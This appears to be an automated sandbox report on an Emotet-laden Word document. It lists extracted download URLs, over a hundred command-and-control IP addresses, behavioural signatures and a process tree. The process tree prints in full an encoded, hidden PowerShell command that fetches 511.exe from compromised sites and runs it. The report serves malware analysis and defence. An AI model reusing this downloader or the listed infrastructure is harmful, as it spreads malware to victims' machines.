Analysis
-
max time kernel
25s -
resource
win10v191014 -
submitted
12-12-2019 09:02
General
Malware Config
Extracted
http://theaustinochuks.com/personal_array/kvrmif/
http://sarafifallahi.com/wp-admin/uUXtpLhI/
http://faustosarli.com/wp-admin/mYZW0/
http://janejahan.com/wp-content/hqiw1u9/
http://vikstory.ca/h/f2cgRvw/
Extracted
emotet
110.143.84.202:80
75.80.148.244:80
64.53.242.181:8080
37.59.24.177:8080
66.34.201.20:7080
108.179.206.219:8080
45.56.88.91:443
206.189.112.148:8080
211.63.71.72:8080
178.210.51.222:8080
92.186.52.193:80
195.244.215.206:80
2.38.99.79:80
37.157.194.134:443
206.81.10.215:8080
80.21.182.46:80
80.11.163.139:21
190.56.255.118:80
190.226.44.20:21
173.70.81.77:80
190.12.119.180:443
120.150.246.241:80
110.142.38.16:80
192.241.255.77:8080
181.31.213.158:8080
178.209.71.63:8080
212.186.191.177:80
85.72.180.68:80
181.57.193.14:80
46.105.131.87:80
12.176.19.218:80
86.98.156.239:443
167.71.10.37:8080
116.48.142.21:443
176.31.200.130:8080
45.51.40.140:80
67.225.179.64:8080
110.143.57.109:80
185.159.102.74:80
1.33.230.137:80
212.64.171.206:80
144.139.247.220:80
165.228.24.197:80
188.152.7.140:80
70.175.171.251:80
165.227.156.155:443
5.196.74.210:8080
182.176.132.213:8090
164.68.101.171:80
149.202.153.252:8080
5.88.182.250:80
62.75.187.192:8080
104.131.44.150:8080
12.229.155.122:80
167.114.242.226:8080
107.2.2.28:80
128.65.154.183:443
31.31.77.83:443
98.24.231.64:80
217.160.182.191:8080
87.106.136.232:8080
218.44.21.114:80
190.53.135.159:21
87.230.19.21:8080
91.231.166.126:8080
186.75.241.230:80
197.254.221.174:80
92.222.216.44:8080
209.97.168.52:8080
100.14.117.137:80
183.102.238.69:465
107.170.24.125:8080
104.131.11.150:8080
103.86.49.11:8080
58.171.42.66:8080
108.191.2.72:80
91.73.197.90:80
66.76.63.99:80
210.6.85.121:80
139.130.241.252:443
201.184.105.242:443
45.33.49.124:443
73.11.153.178:8080
78.24.219.147:8080
24.45.193.161:7080
104.236.246.93:8080
50.116.86.205:8080
31.131.182.30:80
31.172.240.91:8080
101.187.134.207:443
212.129.24.79:8080
91.205.215.66:8080
189.209.217.49:80
73.176.241.255:80
101.187.247.29:80
159.65.25.128:8080
167.99.105.223:7080
190.211.207.11:443
190.147.215.53:22
83.136.245.190:8080
169.239.182.217:8080
176.106.183.253:8080
61.197.110.214:80
93.147.141.5:80
87.106.139.101:8080
104.237.155.168:443
209.141.54.221:8080
181.143.194.138:443
59.103.164.174:80
91.242.138.5:80
74.105.102.97:8080
47.156.70.145:80
200.7.243.108:443
201.173.217.124:443
173.13.135.102:80
95.128.43.213:8080
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4924 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4924 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4580 Powershell.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE511.exe511.exepid process 4924 WINWORD.EXE 4344 511.exe 4736 511.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
SppExtComObj.exePowershell.exe511.exedescription pid process target process PID 4176 wrote to memory of 3692 4176 SppExtComObj.exe SLUI.exe PID 4580 wrote to memory of 4344 4580 Powershell.exe 511.exe PID 4344 wrote to memory of 4736 4344 511.exe 511.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4580 Powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
511.exe511.exepid process 4344 511.exe 4736 511.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4238fff71c14fe6622197aa629c14f199b8c7195d4d1e2093bcca325ed14b70d.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABQAGUAZwB4AGkAagByAGsAdgBwAD0AJwBEAGUAbgBsAGsAdQB3AGQAdQBmAHoAJwA7ACQAUABhAHAAbgBvAHkAZABzAHgAIAA9ACAAJwA1ADEAMQAnADsAJABHAGwAegBpAGEAZwBwAGoAPQAnAEYAZQBkAHIAeQB2AHQAbwBhAG4AJwA7ACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUABhAHAAbgBvAHkAZABzAHgAKwAnAC4AZQB4AGUAJwA7ACQAQQBtAHMAeQBiAGMAcgBrAGYAPQAnAEkAYwBmAGsAbgBwAGkAeQAnADsAJABKAG8AawBzAHYAcQB5AHYAeQBtAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAGUAbgBUADsAJABKAHUAeABkAHIAaABoAGoAdABpAD0AJwBoAHQAdABwADoALwAvAHQAaABlAGEAdQBzAHQAaQBuAG8AYwBoAHUAawBzAC4AYwBvAG0ALwBwAGUAcgBzAG8AbgBhAGwAXwBhAHIAcgBhAHkALwBrAHYAcgBtAGkAZgAvACoAaAB0AHQAcAA6AC8ALwBzAGEAcgBhAGYAaQBmAGEAbABsAGEAaABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1AFUAWAB0AHAATABoAEkALwAqAGgAdAB0AHAAOgAvAC8AZgBhAHUAcwB0AG8AcwBhAHIAbABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBtAFkAWgBXADAALwAqAGgAdAB0AHAAOgAvAC8AagBhAG4AZQBqAGEAaABhAG4ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHEAaQB3ADEAdQA5AC8AKgBoAHQAdABwADoALwAvAHYAaQBrAHMAdABvAHIAeQAuAGMAYQAvAGgALwBmADIAYwBnAFIAdgB3AC8AJwAuACIAcwBgAHAAbABJAHQAIgAoACcAKgAnACkAOwAkAEMAZgBnAHEAZQBlAHoAbAA9ACcASQBvAHkAawBtAHAAYwBlAG0AcgAnADsAZgBvAHIAZQBhAGMAaAAoACQARAB4AG0AZgB4AHQAYQB1AGUAYwB4AHAAdAAgAGkAbgAgACQASgB1AHgAZAByAGgAaABqAHQAaQApAHsAdAByAHkAewAkAEoAbwBrAHMAdgBxAHkAdgB5AG0ALgAiAEQAbwBgAFcATgBMAG8AQQBkAGYAYABJAGAATABlACIAKAAkAEQAeABtAGYAeAB0AGEAdQBlAGMAeABwAHQALAAgACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgApADsAJABMAGQAdgBvAHMAbABnAHoAcwA9ACcARwB5AGgAbABoAHcAeQByAHkAdQBoACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQATAB0AGUAdQB2AHMAcQBtAGIAbABhAHEAZgApAC4AIgBsAGUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMwAzADkAOAAyACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAEwAdABlAHUAdgBzAHEAbQBiAGwAYQBxAGYAKQA7ACQAVgB4AHgAbQBkAG0AYwBpAD0AJwBEAHYAcQBsAG8AZQBsAHUAdAB4AHIAbQAnADsAYgByAGUAYQBrADsAJABWAGkAbwB6AHUAbQBlAGwAPQAnAFgAbgBqAG4AbwBjAG8AeQBkAG0AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBtAGQAdQBqAG0AeQB3AG0AaQA9ACcAUQB2AHgAYwBvAGoAcABzAHUAZwBvAGEAJwA=1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\511.exe"C:\Users\Admin\511.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Users\Admin\511.exe--a155b8533⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\511.exe
-
C:\Users\Admin\511.exe
-
C:\Users\Admin\511.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
memory/4344-10-0x00000000023A0000-0x00000000023B7000-memory.dmpFilesize
92KB